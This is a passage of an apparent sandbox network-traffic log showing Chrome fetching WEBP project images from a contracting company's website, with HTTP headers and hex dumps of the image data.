                                              2024-09-27 06:20:21 UTC8000INData Raw: 1b 4b bd 76 4c 65 22 51 e5 2e fe 9d d0 8d 47 05 06 78 55 f3 78 dd e6 7d 70 2e e0 b4 07 59 9b af 7f 19 3a 19 95 c5 21 c9 6b 94 04 fa 83 5a e5 b5 d9 1e 75 e3 ec 20 fe 8e 33 7c b1 d8 98 1f 81 39 09 50 a5 e4 b1 90 80 2f c6 7b 04 4c 53 65 71 fc 12 9b dd 46 9f d0 b3 ea 62 1d 98 20 dc 9f 82 fd 52 9b 6c e0 e7 1a 33 66 dd 88 a3 ce d8 50 34 76 7a db 72 09 1b 5e 74 ca 2d f8 f4 12 49 dc ba ed 99 45 fa 0d e0 de 01 2c c6 56 5c 77 ce 45 48 a2 97 18 22 1a 86 f6 e0 9a 60 e4 d3 d1 55 dd 9e df 07 09 88 db f3 01 1b 26 89 b0 4f 00 09 3c f1 27 f9 fd bc e8 37 48 ec bd d9 c8 30 d2 f9 f5 3e e4 42 54 16 78 71 33 d3 17 b5 90 5f 9d 64 e6 0b b2 42 12 8e 42 51 f4 f6 c4 6e 76 4d 92 c6 2a 9e de 5b b8 4d 75 69 57 ab 30 6d 1a b8 be 26 f9 d0 76 0d 80 d6 a4 85 2e 73 d3 b5 1c 75 84 ec 84 cb
                                              Data Ascii: KvLe"Q.GxUx}p.Y:!kZu 3|9P/{LSeqFb Rl3fP4vzr^t-IE,V\wEH"`U&O<'7H0>BTxq3_dBBQnvM*[MuiW0m&v.su
                                              2024-09-27 06:20:21 UTC7927INData Raw: 08 cd 3c fc 78 e7 e2 8e 23 91 fd 82 08 79 c5 44 44 9f 30 4c fd e3 56 f0 42 a4 ea 3c 06 27 58 16 e6 f6 4b 8c 2e da 6d f9 bf c1 2b a1 37 59 93 f7 22 60 c9 54 d4 7c c9 24 09 42 da 55 33 8e 0a fc fc c2 30 8f 50 4a 54 e9 21 38 83 b4 57 b7 f8 5c 59 85 1a 41 a1 53 37 08 a3 2f 50 af b3 bb 89 2d c7 0a c6 9b 71 16 5c 6a e8 47 a6 93 23 c7 09 ab 43 2d 69 21 19 b0 1e f2 96 5d 1e c6 03 7e e9 9b 06 5a 6a cf 03 56 30 33 8c 9a 00 75 66 be c4 f9 4b 8d 4c 97 b0 47 a5 bc e0 80 7c ef d3 fa 44 14 ca bc 54 30 88 2f c4 a8 97 88 f6 68 f7 4b dc a3 82 1d 3b 6b b5 4c c2 9f 98 70 4c 52 c1 bb 8c 14 ae a5 3f bb 42 9b 8b ee 3c ab cc d0 69 1a 50 8f 44 c8 02 df 44 ba dd f0 d2 a0 7f 74 59 7a 2a 94 8d 24 df 1e 72 87 f0 51 21 11 f8 27 d2 48 e6 a6 8b 8e 7a a7 7a 5f b9 05 a2 3e bb 4f 18 f3 4a
                                              Data Ascii: <x#yDD0LVB<'XK.m+7Y"`T|$BU30PJT!8W\YAS7/P-q\jG#C-i!]~ZjV03ufKLG|DT0/hK;kLpLR?B<iPDDtYz*$rQ!'Hzz_>OJ


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              126192.168.2.465462173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:21 UTC465OUTGET /uploads/projects/30/d32187d7377ba8b456ad17d703a1f7c9.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:21 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:21 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Tue, 10 Jan 2023 11:59:57 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 56086
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:21 UTC7931INData Raw: 52 49 46 46 0e db 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 9a da 00 00 10 21 05 9d 01 2a cf 04 a3 03 3e e9 70 af 53 29 26 3d b4 24 32 ba 63 b0 1d 09 67 6d e7 d7 5f ef b4 c5 ef f8 ba 85 b2 f8 42 90 8b a1 ff e4 e6 46 5d 7c aa 7c 63 ea 35 1a ba a4 c0 e2 26 bd 7e 2c cf 89 5d 49 ff 4d ff bf fd 57 94 cf a0 ff 9c f6 00 f2 5b ff 53 be 2f ba 7f c7 f6 0d fe c3 fe 77 d5 83 3a 4f f1 76 ea a7 df 63 a7 fa 9e ca 8f 5a cf dd 9f 68 dd 52 fd 47 4e bf 9b ee f7 a3 db 9d 2e f3 2e e0 83 ff af a0 2f a1 7f af fb 99 e5 2f ea 3f a1 ff a7 fd 67 bb 7e 33 ff 2b c1 cf f1 7f d9 b3 a9 f7 f9 e2 ef ed 7f cd fa 0e fe df e2 a5 fa 3e 20 da d7 fd 4f 41 af 7a 7f 23 e9 07 3e 0f ce 68 c9 ce 8c f1 df fa fe f5 fb 17 fd c7 ff 37 ef 4f bb 5f fd 0f dd 0e df
                                              Data Ascii: RIFFWEBPVP8XVP8 !*>pS)&=$2cgm_BF]||c5&~,]IMW[S/w:OvcZhRGN..//?g~3+> OAz#>h7O_
                                              2024-09-27 06:20:21 UTC8000INData Raw: 35 6e 26 b3 74 70 a9 4a dd 06 18 1b 55 88 29 da 1e 52 1a a2 de cd ed 2f a6 08 62 7d 68 2d 6c 0b a2 d2 1e 51 b8 31 b7 5d c0 fc 31 f4 66 32 58 5e ed f8 86 de c2 8e a1 f4 53 23 55 66 26 48 f1 4c 9c bf 92 d0 cd 81 7d 0d e7 57 b0 d7 bb de d3 0d 3c 87 1a 4f 03 b4 d2 5d df fc 77 42 60 bd 6e 9e ef fa 9f cb 5b bd ca fb ac 53 f6 7e ae 57 3d c0 f0 d2 c0 9a 37 e4 69 74 1d 60 6f 5d 1b 59 07 83 0b 01 57 bf e1 3d 7d 99 24 0b 72 c1 23 1f ae 91 b6 b8 37 e3 31 18 d5 f5 d3 4f 6b 37 14 97 90 d5 23 83 05 7f c1 f3 5f 39 2d 52 3c 66 ba a8 20 5e 30 cc a1 02 8a 52 2a ad 22 a1 a1 03 db cb 64 30 f7 73 39 5a a1 d2 7a 7f c9 4e 43 19 c1 35 5d 93 fd c9 c5 51 f8 27 4c 9a 60 03 59 42 cf 2d 63 ae 7d 01 40 67 3a 9a 60 fd d1 47 08 74 c3 fc 1a f7 50 05 cc 70 81 a8 79 8e 68 f2 ab 46 0e 69 96
                                              Data Ascii: 5n&tpJU)R/b}h-lQ1]1f2X^S#Uf&HL}W<O]wB`n[S~W=7it`o]YW=}$r#71Ok7#_9-R<f ^0R*"d0s9ZzNC5]Q'L`YB-c}@g:`GtPpyhFi
                                              2024-09-27 06:20:21 UTC8000INData Raw: 59 43 bb 0a 01 ad f6 51 ec fb e8 93 87 25 54 1c 4a 31 b7 ab 88 15 9a 78 eb d0 81 fa 9a a5 0f cb 84 8c 14 30 7c 73 b9 3d cc c7 17 fe 0d bd 4b 7e 7e b9 a3 0e eb bf 1d 4e c6 5b 3b a2 2a ee f8 6c 4f 4c fa ff 26 57 1c 61 82 6b 25 d9 e7 b6 8b 8d dc 5f 96 db ba 18 b8 54 77 11 68 7b 0d 57 f9 01 59 e8 74 a8 3e b4 36 d7 c6 62 80 88 8e 72 23 64 f2 4d be d0 df 18 85 40 e2 5e 1d dd 6e 6f f9 a7 59 2d 7e 32 a2 c6 38 0b 2a 90 79 26 46 d0 c3 ea a7 5c a7 c0 6d be 3c e1 d7 bb 4e 8a ad af 87 18 99 78 6a 15 c6 65 bb 9e 55 05 25 9b 80 1a 0a 0e 2a 16 97 72 46 0d 7c d2 e2 0e 82 e7 f9 a7 f8 2e 74 d6 29 3a ff ee 21 02 6e f9 81 99 b0 f1 af 06 b8 6c 99 99 0c de a6 67 24 3c 79 33 d5 5c 12 b2 75 61 93 9b 86 24 5d 50 70 c6 c1 fc be b0 c0 df a1 9e 5b 9d 56 5e 62 af 11 ff ad e2 57 be 2f
                                              Data Ascii: YCQ%TJ1x0|s=K~~N[;*lOL&Wak%_Twh{WYt>6br#dM@^noY-~28*y&F\m<NxjeU%*rF|.t):!nlg$<y3\ua$]Pp[V^bW/
                                              2024-09-27 06:20:21 UTC8000INData Raw: 22 29 19 6d c8 59 4d 4e d4 d4 5e 8d 96 28 88 e0 a4 d7 a8 38 5a 3c 6c 2c ad 25 0f eb 1e b8 ae ba b2 52 8d 60 35 a5 8e 89 45 7e d9 df 07 66 46 7c b6 14 a6 31 4c 01 0b d1 e3 93 f2 e2 87 cf 4a 6c 7a a3 e5 9b b6 c9 11 26 9b 11 47 82 19 12 12 b5 90 10 42 87 64 c0 42 59 4f de df 99 5d 69 26 e1 36 f1 aa fd 99 e9 f4 56 f8 38 7c c4 fc b4 1d f7 31 c7 fd 45 61 bc 5d af a2 ec 3c db dc 29 ee 9c f2 31 b4 96 7a 9d ea 80 fe 7a d1 eb 31 aa 72 9f a3 47 c6 6b d2 fe ce 4f 33 dd cc c4 62 8c 69 51 40 08 e3 fe ec 07 7f 80 eb b5 ba da b7 47 90 d8 7a 4a b3 12 7c bc 89 e6 fe 95 6b 58 e7 40 ed e6 75 a1 fb 25 1e 93 73 0c 82 35 e4 27 a6 9c 68 35 fa 5e c7 46 d0 2b 74 7f 00 d4 b5 83 90 6f 76 68 83 f9 95 1c 38 63 54 be 94 6d 48 1d 96 d8 9a 3c f3 5d 95 29 d0 80 0c 49 06 db 23 cf cc 84 36
                                              Data Ascii: ")mYMN^(8Z<l,%R`5E~fF|1LJlz&GBdBYO]i&6V8|1Ea]<)1zz1rGkO3biQ@GzJ|kX@u%s5'h5^F+tovh8cTmH<])I#6
                                              2024-09-27 06:20:21 UTC8000INData Raw: 39 c8 4a 02 af 14 9b 0e 69 ba d8 b3 53 4e 23 50 79 8f ef 4a b0 e1 9e 4d 4c 18 d0 a0 c3 1d d2 94 13 03 09 3e 48 42 8a 01 59 18 f5 e4 b4 f4 57 95 d0 b5 1f aa 75 10 f1 0f c3 5c 30 93 be 90 81 c0 75 5a 6b c9 d6 3f 8c 72 97 f2 8c 5f 07 30 cd eb b5 50 26 d3 52 4f 52 68 35 b4 14 f7 05 e4 11 8f 85 f8 8f 37 4b 76 25 2f 88 75 9b 65 14 47 97 06 4b 97 5e 3d 9f 0a f9 0f 75 90 60 e0 64 39 26 00 b4 ca dd 60 32 f8 01 2b 73 7b fc 9b 1c 9b fb 69 36 96 ac 6a a5 7b b6 ca c2 e4 64 c6 4b 46 a7 fa 45 d7 5e 48 25 4d 09 42 e1 09 33 9d 3c ab 4a b5 f2 f3 77 d6 45 b8 5f 5b 5e be 16 6c 0f c3 87 78 7b 35 ca 45 43 a1 ee 66 cf ff 23 93 29 0d d1 98 04 ac 74 d2 41 16 50 a9 e1 cc df 2e 19 c6 d2 f5 ea fa 55 bc 58 9c 55 95 9d 9d fc b6 fc 6c 7d 84 ac 40 89 95 03 8a 0e 06 65 cb bd 42 1d e2 13
                                              Data Ascii: 9JiSN#PyJML>HBYWu\0uZk?r_0P&RORh57Kv%/ueGK^=u`d9&`2+s{i6j{dKFE^H%MB3<JwE_[^lx{5ECf#)tAP.UXUl}@eB
                                              2024-09-27 06:20:21 UTC8000INData Raw: 17 f8 70 41 bf ce 07 81 fb ce f0 6d b2 47 20 48 24 f4 9b 07 63 67 01 6e 2e b0 8c fc b5 dc 12 81 73 e8 7d 4f de 27 c5 a2 3b e9 d6 b8 9d d5 01 db cd 1b f7 b3 b9 59 42 bb 6d 51 17 0a 4e 50 4b 22 c8 4a 84 80 1e 49 61 eb b2 b2 c0 e5 b3 40 eb 4d 39 5e 8b e3 ea 4e b8 96 22 97 b9 9d b7 ad 93 8c fd 1e e3 88 3d 55 07 c4 7e b4 00 b6 b3 7e 06 bc 07 93 05 a5 c7 66 f8 3c 05 fb 98 5d 1c cb 92 ba 5e 7b 71 75 3e e6 c1 42 4f 0d fb 1e fc c5 cc 89 f1 03 c5 5e 10 d2 12 47 19 db 62 54 56 1e 56 64 7d c2 d6 0d 18 47 e0 88 4b 6e 21 66 64 09 b1 08 e4 a6 20 6e 64 01 02 0b ce d9 f7 20 32 80 22 a0 38 a2 a6 7b b2 37 14 10 67 83 6e 63 49 dc 62 f9 0f 7d ab 69 8d 38 68 48 1e e3 79 5f 40 32 c5 43 91 e1 f6 8f 15 e8 36 23 86 51 18 03 fa 17 1d 69 90 4a d3 7b 9d 44 ae 86 09 3c c4 29 c6 2b ea
                                              Data Ascii: pAmG H$cgn.s}O';YBmQNPK"JIa@M9^N"=U~~f<]^{qu>BO^GbTVVd}GKn!fd nd 2"8{7gncIb}i8hHy_@2C6#QiJ{D<)+
                                              2024-09-27 06:20:21 UTC8000INData Raw: 05 4c 83 9f c3 63 21 38 27 c7 6a 82 ed d8 8f 97 1b dc a7 98 ab 18 b3 96 03 f1 4b d3 91 bc a4 32 1b 4d 3e 5d a4 86 ec 56 06 20 5f d3 6b 7f a9 a8 21 cd 5c e4 26 e2 eb ec 09 70 ff 16 0b 83 37 76 5d 04 93 f5 66 b9 00 8a 89 f8 41 a0 1c 63 cc 3f 66 be 7f 15 ff 64 85 38 7a a3 80 a7 b4 e1 6e b6 95 54 79 cb c1 06 12 08 24 4e 46 dc 31 ed e6 68 e3 c3 1c 63 fe 3f 9b a0 9e 8f 40 f5 17 52 99 bc 2a a3 68 66 7e 0d f5 04 71 63 e9 32 a0 14 f8 0f 16 4c f6 a7 2d 8a 2a b1 81 02 9d 5c 91 ed d1 35 0f 7a bf 0b f5 f0 3f 3d 36 d0 22 76 4c a3 5a 2c 55 29 2c f9 88 be 9e 43 eb 85 21 74 e2 4f aa 8d 91 0f 84 f3 fe dc bb 4b ce d1 42 e1 34 68 e2 d5 18 df a5 54 cc 31 85 e3 c4 16 f5 2e 41 10 05 9b c9 1c b0 f0 7f ba c1 a0 c3 de 61 fd ea bb 8c 31 08 ba 2f 87 6f ba 50 53 0a a9 5b d8 a5 3a df
                                              Data Ascii: Lc!8'jK2M>]V _k!\&p7v]fAc?fd8znTy$NF1hc?@R*hf~qc2L-*\5z?=6"vLZ,U),C!tOKB4hT1.Aa1/oPS[:
                                              2024-09-27 06:20:21 UTC155INData Raw: 3a e1 54 17 df 57 b6 f9 20 1e fb e0 33 fd c1 c4 1e 04 97 03 9d 2c 7e 8e f1 b8 ca 58 fb f3 53 2e 74 66 bd c5 a1 90 09 17 51 8e f2 2b d5 1f 82 b9 94 49 f1 07 e0 22 da 08 c4 07 0a 3e ea 34 04 57 25 84 12 00 00 50 53 41 49 4e 00 00 00 38 42 49 4d 03 ed 00 00 00 00 00 10 00 48 00 00 00 01 00 02 00 48 00 00 00 01 00 02 38 42 49 4d 04 28 00 00 00 00 00 0c 00 00 00 02 3f f0 00 00 00 00 00 00 38 42 49 4d 04 43 00 00 00 00 00 0e 50 62 65 57 01 10 00 06 00 2a 00 00 00 00
                                              Data Ascii: :TW 3,~XS.tfQ+I">4W%PSAIN8BIMHH8BIM(?8BIMCPbeW*


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              127192.168.2.465463173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:21 UTC465OUTGET /uploads/projects/20/712fe2efb37a4a3b2be6e91c62276b19.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:21 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:21 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Tue, 10 Jan 2023 11:43:59 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 59298
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:21 UTC7931INData Raw: 52 49 46 46 9a e7 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 26 e7 00 00 90 2d 04 9d 01 2a cf 04 a3 03 3e e9 70 b0 52 a9 26 a5 23 a6 37 e9 69 20 1d 09 67 6e d7 ce cd ba f7 ef 87 ed 90 94 45 fa f6 36 a0 25 90 57 c8 9d 6b 98 f6 5a fa 0b c1 4e 8e be 72 b3 e7 f2 ba 3a ea a7 65 fd ad 9b ef 1d 5d 48 71 d6 f0 0c e0 fe 6f bf d7 a6 ff f6 de 97 bd 24 bf b3 7a 33 f3 79 f5 03 fd d7 a6 93 d6 8b f9 df a9 3f ee 3f ae 2f ae 27 fb 7c 96 5f b2 f9 0d fa af f8 9d f6 fe af f9 df f9 3f d1 fb 75 dd ff e6 bf d7 fd bb f5 5f fb 87 f0 6d 03 7f a9 e0 3f f0 ff da 7a 08 fe f7 e5 9d 03 3e c2 50 37 ea 3f e4 bd 01 bf 4f f6 cf d6 3f e4 ff de fe cd 7c 02 fe df fa af ff b7 c6 c7 f2 ff f9 fd 85 bf ab ff bc f5 91 fb ff ff d1 ea af f7 6f fc ff bc bf 03
                                              Data Ascii: RIFFWEBPVP8XVP8 &-*>pR&#7i gnE6%WkZNr:e]Hqo$z3y??/'|_?u_m?z>P7?O?|o
                                              2024-09-27 06:20:21 UTC8000INData Raw: 23 c5 2b f5 91 2d b4 7a 93 f7 9a f3 d5 83 5f 41 78 63 78 ff f1 45 23 fe 1e d6 9c a1 a6 55 a2 dc 19 4e c8 c1 64 00 d9 3d 81 ec 93 d9 ca d7 cd 9f ba 61 82 b0 ea 44 ac e4 38 5d e7 c1 3f 30 19 d0 d7 5a 8f 95 c0 70 11 ab 23 88 1e 91 a7 e2 a5 60 52 7b 3b 27 ff 0e 43 a3 c8 e2 23 58 17 8f 42 35 a8 37 33 ad 10 ee 2b 05 e0 da 10 3f e0 9e 59 b5 ae 6e e0 02 9d 10 c9 01 e2 ab 82 00 18 30 ef ee 2f 7f 6f 6c 7d ef 89 05 f5 38 81 09 f4 2c 7f bb 31 0a a4 c5 52 59 3e a0 ab b1 0a 9d 0c 39 fc 01 56 76 c7 76 e0 d2 4f c8 e3 02 24 1b 4f 48 67 fa 91 f2 04 5e 1b 4f 13 77 20 e0 73 9d 5d bd ad 49 80 28 18 fb ab 2d 9c 72 e3 ad bd 21 0a 67 b0 13 39 bd 59 58 00 01 a3 7e 61 dc e4 3c 62 2a 44 c8 a8 bf 49 51 4d 83 ce fb 79 2d ce 65 ed 12 b6 da 19 ed 49 ce 6e fd 56 05 8c 4e 2e 9d 05 1f 31
                                              Data Ascii: #+-z_AxcxE#UNd=aD8]?0Zp#`R{;'C#XB573+?Yn0/ol}8,1RY>9VvvO$OHg^Ow s]I(-r!g9YX~a<b*DIQMy-eInVN.1
                                              2024-09-27 06:20:21 UTC8000INData Raw: 70 45 78 7c e0 d1 1c 23 d5 a6 78 e6 3b 0b 83 f0 ee 0f e9 1e aa 18 0e 07 82 4d fb 2c 4e e9 1c 61 e0 4c 2c 2a 19 90 53 6a 4b ea 83 2c 91 f1 25 6c d3 8e cd bc 06 2b dd 62 dc 6a 16 a7 58 1f 83 87 38 07 fb cc 8c 0e 60 d1 0f ae 0e b7 25 27 31 c9 25 bf 60 07 e4 4e b5 bb 4d 0d 6a 33 cb 6e ab a9 78 a2 c2 d8 bc d0 d9 f6 54 0c 88 0e 1e b6 f5 62 a1 38 db ec 0d d0 a3 53 77 c5 be fb 74 66 d6 9b ac 55 ca b2 ee 20 65 96 e0 24 d1 12 9f bf c8 49 12 6e c2 83 88 73 67 f6 9a 6c 1e af 9f 57 3e 8f a3 0d b3 70 51 c4 73 cf 72 ca 6f da c3 55 e8 3f 5f 8f d9 1d 12 55 95 c7 be 78 02 e5 66 bf d3 59 e3 5e 45 30 41 8e 67 ae f7 d2 40 32 17 f9 32 ab 87 55 9f bf e3 d7 90 6f 88 4d 2c 15 5d 0a 0d 7b 92 ec 24 c9 60 41 9b ad 12 bf 6e 5c ef 7a 8e 66 a2 65 ab 41 7b fa ef db 27 88 48 b4 5b 5b b0
                                              Data Ascii: pEx|#x;M,NaL,*SjK,%l+bjX8`%'1%`NMj3nxTb8SwtfU e$InsglW>pQsroU?_UxfY^E0Ag@22UoM,]{$`An\zfeA{'H[[
                                              2024-09-27 06:20:21 UTC8000INData Raw: 63 4d ee a3 73 ad ca dd c1 8d e5 d2 cc 85 33 02 b2 9c 35 d1 4a 37 e6 61 7a 83 f4 b4 4b 9e 19 74 27 b9 17 ca 6f 53 22 f8 85 e4 9c 99 ae af 64 b5 6f a4 2c 6b 4f d7 ac 15 d1 2e db a8 1d 88 a6 cb db 6f 0e 45 28 a6 1b 9b ae e4 0c d7 7f ee 8f 39 27 7b 06 6d 52 14 ce 4b c2 3a 55 d7 19 25 a7 9f c3 42 22 82 f6 b5 be 09 ef ba 7b 04 de cd a3 24 cb ae 6d c7 07 bb 91 94 b1 4c 3b a8 c1 fc e3 de dc 24 26 13 00 4c 33 d2 d7 ea b3 9b aa e7 01 6c 85 5b 8f 1c fa d7 ac 3d 2d 6e d3 03 84 fb dc 0e e0 d3 4c 56 0a 23 a7 ac b0 ef d1 69 c5 2a 86 fd 63 45 e0 bb 9a 4b 67 7e 9c b6 7e 33 14 1d d1 74 e7 09 ec da bd 26 5b 9d f5 8e 45 47 dc ed 0d af 04 09 8f a7 46 33 dc 47 f1 ce 9d b5 a2 d1 10 58 a8 68 1e 97 51 6a 6a 07 d5 a4 ba 50 38 32 4b 0b 1a f7 c6 bf 35 91 28 30 bd 55 ba 0d 74 c8 a6
                                              Data Ascii: cMs35J7azKt'oS"do,kO.oE(9'{mRK:U%B"{$mL;$&L3l[=-nLV#i*cEKg~~3t&[EGF3GXhQjjP82K5(0Ut
                                              2024-09-27 06:20:21 UTC8000INData Raw: 46 19 e6 c1 df 74 67 7b d3 c8 63 54 ce b2 1f 55 53 c9 58 3f b0 11 27 bc b5 ae 63 89 61 07 b2 b5 fc 88 c7 fb 0d 0f 3c 3a 80 c9 b2 60 0b d3 ff c9 a6 55 c1 f2 aa 2e c4 61 9b 54 7b cc 71 9c 5d 85 4d 22 92 4a c1 c9 7f b4 b5 df 1a cb f5 f8 7a b5 db 82 a5 77 1b 36 9f 8a 5c 44 d6 b3 64 a2 54 6e 74 35 32 10 65 d3 f1 ef 6a 68 66 dc e0 a7 21 25 11 4b a9 f0 d5 89 d1 7a f7 8b b9 d7 51 2a 35 3e 22 a2 fd 83 fa 22 05 54 fb e8 41 39 94 fe 79 02 b7 dd 5b 14 17 88 2f 7b ce 57 02 57 53 94 20 1f d4 4e 4e e0 91 5a 5b 3e 0c 3a 48 a4 ac 30 fa 58 0c 84 0d c3 90 94 97 35 b9 a1 ee 0f b3 4d 12 ad 8f 4c 1c 89 df 20 9c 5a 79 0c 1f 2c 15 2b a5 54 86 81 ba 09 4b 6d a7 e0 c6 d4 7f 02 b3 82 61 55 a1 c4 0f be 22 37 2a 5f 4f 57 c2 03 ad c5 6f 98 9c dd a7 b3 c4 eb 56 e7 85 8e 55 ea 76 4a 23
                                              Data Ascii: Ftg{cTUSX?'ca<:`U.aT{q]M"Jzw6\DdTnt52ejhf!%KzQ*5>""TA9y[/{WWS NNZ[>:H0X5ML Zy,+TKmaU"7*_OWoVUvJ#
                                              2024-09-27 06:20:21 UTC8000INData Raw: 8d b4 ce bb 4f 4f 5e f9 2e 4c ad 61 ea 0b f0 c2 4b 4e a6 59 9a 11 7a 41 26 05 b2 94 ff 61 06 9f 9f ae b5 d7 2f a5 78 79 a5 b3 7d e2 3c 72 6b b9 10 a8 90 62 fe cc 65 5d 2c 4c e9 fb 24 20 0c 51 1d 6a 18 75 8c 36 de df 57 e1 0f 5d 43 6b f7 56 db 95 f2 cb 4a 26 ab e0 df dd f6 7e 03 7d 81 f0 42 e5 b6 0a dd 2e 7b 5d c8 5e 95 1e a2 c3 8e 6f 85 99 b2 64 ba 76 ad 11 5f 2c 22 3c 47 66 67 43 c7 26 55 cb ae f0 56 af 90 a4 e2 a5 c0 66 73 0e d7 cb 89 b1 72 18 19 93 bc 95 f6 2e 2d 40 86 06 4e f7 e8 be fc 4b ea 56 cc 97 2d 38 91 ce 1b 3a 15 d6 00 de d1 ae c2 50 4c f2 47 66 c9 bc 65 b8 9f 2c 35 d4 76 5e 02 ff 22 5c 29 76 1f 1a eb 80 19 17 3e 96 ce 1f d8 7d 14 1e 69 02 cd 46 ad eb c0 6d 47 ac 20 51 b1 11 fb b2 76 6e 5a 0e 0c 15 e3 c5 ab e7 92 4f b1 6d 4e 17 c2 1c 8d 15 7f
                                              Data Ascii: OO^.LaKNYzA&a/xy}<rkbe],L$ Qju6W]CkVJ&~}B.{]^odv_,"<GfgC&UVfsr.-@NKV-8:PLGfe,5v^"\)v>}iFmG QvnZOmN
                                              2024-09-27 06:20:21 UTC8000INData Raw: 3c 67 a3 83 a9 f4 67 39 f7 cc 68 19 1b 79 d2 b0 a5 26 02 83 00 bc 0d 95 40 de e6 9d a1 3e 1b f1 ee 9b a9 0e be f9 b8 bb a1 1c 98 f9 f9 93 3c b6 42 03 f1 40 ed 72 b9 22 d2 0c 60 81 0d aa 71 8a 47 21 40 6b 0d 8b 46 92 0b 97 34 4e 51 e5 66 40 6f 87 22 06 b3 cb 33 b3 42 37 2c ce fb 9f 29 ef 2f 2c 1a f4 ec f4 fb 8b 48 e1 67 c1 eb f1 8a 0b 38 0d 37 22 0d 6e 77 b0 00 ef b0 9b 1b ee f3 3a 70 b0 ff a0 33 d7 ba 48 39 c1 56 fc 69 9d ed 44 d2 79 ed 39 70 b1 75 47 ae ff 7b 44 f2 7c 00 bd cb 63 fe 43 b5 ad 65 b5 28 1e b0 c2 fc d0 10 d9 d7 89 f7 00 57 f1 2d 3e 56 95 3c e0 b4 12 5f 54 59 5e 12 e1 59 ab 86 98 01 2f 2a 8c c6 a2 3b a0 7d eb eb 04 fc 5f 46 a3 f1 67 a2 e7 92 d9 be 5e dc c5 e2 fd d6 88 f0 79 91 5a 8d d8 de d2 3d 15 d8 58 f6 0e ad 51 e3 7a bc 81 95 df 1f fa 79
                                              Data Ascii: <gg9hy&@><B@r"`qG!@kF4NQf@o"3B7,)/,Hg87"nw:p3H9ViDy9puG{D|cCe(W->V<_TY^Y/*;}_Fg^yZ=XQzy
                                              2024-09-27 06:20:21 UTC3367INData Raw: 5f 9a c3 6e 4b 95 b0 42 a6 3d 0d 85 bc 48 b6 c5 6d 20 49 79 e5 66 19 97 2f fc 50 67 8d 43 b4 3c 1a ab 32 4f 53 8c a7 b9 a9 75 3f 0a 27 a6 ca 51 f1 d1 f6 73 68 c5 e5 0e 91 5e 39 88 bc ea 64 8a ee f9 c8 9d 03 59 4b 11 95 b4 f6 ae 9b dc 41 3f 70 5b 65 fe 35 ef 6e be 6d 96 08 f8 1f 1d a3 1b 2d 0a b5 0a e1 f0 90 14 c7 ef 7d ce d4 ac 7c 09 22 6b fc 14 cf e8 83 93 08 7e 49 6c 15 62 e5 9b 75 72 52 09 1d a6 53 7c 62 0e c6 b0 80 e6 e4 06 da 54 e8 b9 8e 8b df a1 14 2c 20 e1 2a cf a2 42 47 07 eb ad 95 d3 36 f0 fc 73 bb e4 03 ff 9b f5 d2 0a 30 9f 9d 40 7c 68 13 55 80 bb db a9 96 b7 b2 19 3a e2 81 70 dc a0 00 3e df 5a 91 6d 6a d5 03 c4 4b 78 5d 70 74 d6 4a 66 76 bf 85 c6 5e 84 ea a0 2f 3f 78 70 1c e4 45 86 52 c9 33 f6 94 27 e0 20 d8 28 15 53 a0 66 e6 d3 25 5e 97 ea 19
                                              Data Ascii: _nKB=Hm Iyf/PgC<2OSu?'Qsh^9dYKA?p[e5nm-}|"k~IlburRS|bT, *BG6s0@|hU:p>ZmjKx]ptJfv^/?xpER3' (Sf%^


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              128192.168.2.465464173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:21 UTC465OUTGET /uploads/projects/24/edfba0a01d899e45cac743ee4b47082a.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:21 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:21 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
